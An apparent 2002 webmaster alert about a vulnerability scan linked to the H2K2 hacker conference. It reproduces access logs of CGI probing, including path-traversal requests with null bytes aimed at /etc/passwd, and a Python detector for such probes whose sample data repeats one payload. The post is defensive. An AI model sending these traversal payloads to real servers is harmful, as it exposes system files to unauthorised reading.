ALERT! Hackers conference now on in NYC
I am being probed by a machine which appears to be associated with H2K2 - http://www.h2k2.net/ - "H2K2 will take place July 12-14, 2002 in New York City" - http://www.h2k2.net/faq.html
Q: What is H2K2?
A: H2K2 is the 2002 Hackers On Planet Earth (HOPE) conference, a gathering for hackers of all types.
Be alert to this. The type of probe being run is testing for 'well known applications' being installed in your cgi-bin, among other places. No doubt many or all of these are compromised. Be aware...
e.g.:
- [13/Jul/2002:23:12:17 -0700] "HEAD / HTTP\\1.0" 400 0 "-" "-"
- [13/Jul/2002:23:12:18 -0700] "HEAD /// HTTP/1.0" 200 0 "-" "-"
- [13/Jul/2002:23:12:18 -0700] "HEAD ///server-info HTTP/1.0" 404 0 "-" "-"
- [13/Jul/2002:23:12:18 -0700] "HEAD ///server-status HTTP/1.0" 404 0 "-" "-"
- [13/Jul/2002:23:12:19 -0700] "HEAD /site/eg/ HTTP/1.0" 404 0 "-" "-"
- [13/Jul/2002:23:12:19 -0700] "HEAD /doc/ HTTP/1.0" 404 0 "-" "-"
- [13/Jul/2002:23:12:19 -0700] "HEAD /~nobody/ HTTP/1.0" 404 0 "-" "-"
- [13/Jul/2002:23:12:19 -0700] "HEAD ///manual/ HTTP/1.0" 200 0 "-" "-"
- [13/Jul/2002:23:12:19 -0700] "HEAD /cgi-bin/ HTTP/1.0" 403 0 "-" "-"
- [13/Jul/2002:23:12:20 -0700] "HEAD /cgi-bin/ad.cgi HTTP/1.0" 404 0 "-" "-"
- [13/Jul/2002:23:12:20 -0700] "HEAD /cgi-bin/aglimpse HTTP/1.0" 404 0 "-" "-"
- [13/Jul/2002:23:12:23 -0700] "HEAD /cgi-bin/AnyForm2 HTTP/1.0" 404 0 "-" "-"
- [13/Jul/2002:23:12:23 -0700] "HEAD /cgi-bin/bbs_forum.cgi HTTP/1.0" 404 0 "-" "-"
- [13/Jul/2002:23:12:23 -0700] "HEAD /cgi-bin/bsguest.cgi HTTP/1.0" 404 0 "-" "-"
- [13/Jul/2002:23:12:23 -0700] "HEAD /cgi-bin/bslist.cgi HTTP/1.0" 404 0 "-" "-"
- [13/Jul/2002:23:12:23 -0700] "HEAD /cgi-bin/campas HTTP/1.0" 404 0 "-" "-"
- [13/Jul/2002:23:12:23 -0700] "HEAD /// HTTP/1.0" 200 0 "-" "-"
- [13/Jul/2002:23:12:24 -0700] "HEAD ///carbo.ddl HTTP/1.0" 404 0 "-" "-"
- [13/Jul/2002:23:12:24 -0700] "HEAD /cgi-bin/count.cgi HTTP/1.0" 404 0 "-" "-"
- [13/Jul/2002:23:12:24 -0700] "HEAD /cgi-bin/cgforum.cgi HTTP/1.0" 404 0 "-" "-"
- [13/Jul/2002:23:12:24 -0700] "HEAD /cgi-bin/faxsurvey HTTP/1.0" 404 0 "-" "-"
- [13/Jul/2002:23:12:24 -0700] "HEAD /cgi-bin/gbook.cgi HTTP/1.0" 404 0 "-" "-"
- [13/Jul/2002:23:12:27 -0700] "HEAD /cgi-bin/htsearch HTTP/1.0" 404 0 "-" "-"
- [13/Jul/2002:23:12:27 -0700] "HEAD /cgi-bin/htmlscript HTTP/1.0" 404 0 "-" "-"
- [13/Jul/2002:23:12:27 -0700] "HEAD /cgi-bin/jj HTTP/1.0" 404 0 "-" "-"
- [13/Jul/2002:23:12:27 -0700] "HEAD /technote/ HTTP/1.0" 404 0 "-" "-"
- [13/Jul/2002:23:12:27 -0700] "HEAD /cgi-bin/mmstdod.cgi HTTP/1.0" 404 0 "-" "-"
- [13/Jul/2002:23:12:28 -0700] "HEAD /cgi-bin/newdesk HTTP/1.0" 404 0 "-" "-"
- [13/Jul/2002:23:12:28 -0700] "HEAD /cgi-bin/register.cgi HTTP/1.0" 404 0 "-" "-"
- [13/Jul/2002:23:12:28 -0700] "HEAD /cgi-bin/simplestguest.cgi HTTP/1.0" 404 0 "-" "-"
- [13/Jul/2002:23:12:28 -0700] "HEAD /cgi-bin/statusconfig.pl HTTP/1.0" 404 0 "-" "-"
- [13/Jul/2002:23:12:31 -0700] "HEAD /cgi-bin/webgais HTTP/1.0" 404 0 "-" "-"
- [13/Jul/2002:23:12:31 -0700] "HEAD /iisadmpwd/ HTTP/1.0" 404 0 "-" "-"
- [13/Jul/2002:23:12:34 -0700] "HEAD /cgi-bin/webgais HTTP/1.0" 404 0 "-" "-"
- [13/Jul/2002:23:12:44 -0700] "HEAD /cgi-bin/infosrch.cgi HTTP/1.0" 404 0 "-" "-"
- [13/Jul/2002:23:12:45 -0700] "HEAD /cgi-bin/rguest.exe HTTP/1.0" 404 0 "-" "-"
- [13/Jul/2002:23:12:46 -0700] "HEAD /mall_log_files/ HTTP/1.0" 404 0 "-" "-"
- [13/Jul/2002:23:12:47 -0700] "HEAD /cgi-bin/ezshopper2/loadpage.cgi HTTP/1.0" 404 0 "-" "-"
- [13/Jul/2002:23:12:47 -0700] "HEAD /Admin_files/ HTTP/1.0" 404 0 "-" "-"
- [13/Jul/2002:23:12:48 -0700] "GET ///quote.html HTTP/1.0" 404 282 "-" "-"
- [13/Jul/2002:23:12:48 -0700] "GET /cgi-bin/cal_make.pl?p0=../../../../../../../../../../../../etc/passwd%00 HTTP/1.0" 404 289 "-" "-"
- [13/Jul/2002:23:12:58 -0700] "HEAD /cgi-bin/dcboard.cgi HTTP/1.0" 404 0 "-" "-"
- [13/Jul/2002:23:12:58 -0700] "GET /cgi-bin/nph-maillist.pl HTTP/1.0" 404 293 "-" "-"
- [13/Jul/2002:23:12:58 -0700] "GET /cgi-bin/talkback.cgi?article=../../../../../../../../etc/passwd%00&action=view&matchview=1 HTTP/1.0" 404
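
One way to detect the kind of probe logged above, added here as an example and not part of the original post: it flags any client that hits many distinct paths answered with 4xx inside a short window, or that sends `../` or `%00` in a request. The client addresses, thresholds and function names are assumptions (the excerpt above omits the client field), and the sample lines are constructed from the requests shown.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta
from urllib.parse import unquote

# Constructed sample: requests modelled on the log above, client addresses invented.
SAMPLE = [
    '192.0.2.10 - - [13/Jul/2002:23:12:19 -0700] "HEAD /cgi-bin/ HTTP/1.0" 403 0 "-" "-"',
    '192.0.2.10 - - [13/Jul/2002:23:12:20 -0700] "HEAD /cgi-bin/ad.cgi HTTP/1.0" 404 0 "-" "-"',
    '192.0.2.10 - - [13/Jul/2002:23:12:20 -0700] "HEAD /cgi-bin/aglimpse HTTP/1.0" 404 0 "-" "-"',
    '192.0.2.10 - - [13/Jul/2002:23:12:23 -0700] "HEAD /cgi-bin/AnyForm2 HTTP/1.0" 404 0 "-" "-"',
    '192.0.2.10 - - [13/Jul/2002:23:12:48 -0700] "GET /cgi-bin/cal_make.pl?p0=../../../../etc/passwd%00 HTTP/1.0" 404 289 "-" "-"',
    '192.0.2.20 - - [13/Jul/2002:23:13:03 -0700] "GET /favicon.ico HTTP/1.0" 404 282 "-" "-"',
]

# Common/combined log format: client, timestamp, request target, status.
LINE_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"[A-Z]+ (?P<target>\S+)[^"]*" (?P<status>\d{3})')

def parse(line):
    m = LINE_RE.match(line)
    if not m:
        return None  # not an access-log line
    ts = datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z")
    return m["client"], ts, m["target"], int(m["status"])

def is_traversal(target):
    # Decode percent-escapes first so %2e%2e%2f and %00 are seen as ../ and NUL.
    decoded = unquote(target)
    return "../" in decoded or "\x00" in decoded

def detect_probes(lines, window=timedelta(seconds=60), min_misses=5):
    """Return {client: {"misses": n, "traversal": [targets]}} for scanner-like clients."""
    misses, traversal = defaultdict(list), defaultdict(list)
    for client, ts, target, status in filter(None, map(parse, lines)):
        if is_traversal(target):
            traversal[client].append(target)
        if 400 <= status < 500:
            misses[client].append((ts, target.split("?")[0]))
    report = {}
    for client in set(misses) | set(traversal):
        events = sorted(misses[client])
        # Largest number of distinct failed paths inside any one window.
        best = max((len({p for t, p in events[i:] if t - s <= window})
                    for i, (s, _) in enumerate(events)), default=0)
        if best >= min_misses or traversal[client]:
            report[client] = {"misses": best, "traversal": traversal[client]}
    return report
```

Calling `detect_probes(SAMPLE)` reports only `192.0.2.10`; the single favicon 404 from `192.0.2.20` stays below the threshold.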